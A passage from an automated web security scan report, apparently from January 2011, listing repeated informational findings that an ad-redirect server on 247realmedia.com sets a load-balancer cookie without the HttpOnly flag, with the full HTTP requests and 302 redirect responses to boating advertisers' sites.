  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1446678663/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

14.446. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486045072/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486045072/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486045072/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/
...[SNIP]...

14.447. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500213411/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500213411/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500213411/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

14.448. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1506780268/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1506780268/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1506780268/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i
...[SNIP]...

14.449. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/156346633/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/156346633/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/156346633/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

14.450. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1567263834/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1567263834/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1567263834/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i
...[SNIP]...

14.451. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1591422292/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1591422292/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1591422292/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

14.452. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1593051790/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1593051790/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1593051790/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:27:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 402
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run
...[SNIP]...

14.453. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609584897/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609584897/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609584897/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:59:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

14.454. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1652734120/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1652734120/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1652734120/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:39:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

14.455. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1656197317/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1656197317/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1656197317/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:01:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.456. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1685265758/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1685265758/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1685265758/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:06:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i
...[SNIP]...

14.457. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1686621276/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1686621276/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1686621276/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:38:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/
...[SNIP]...

14.458. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697505280/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697505280/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697505280/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:03:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.459. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1698039722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1698039722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1698039722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
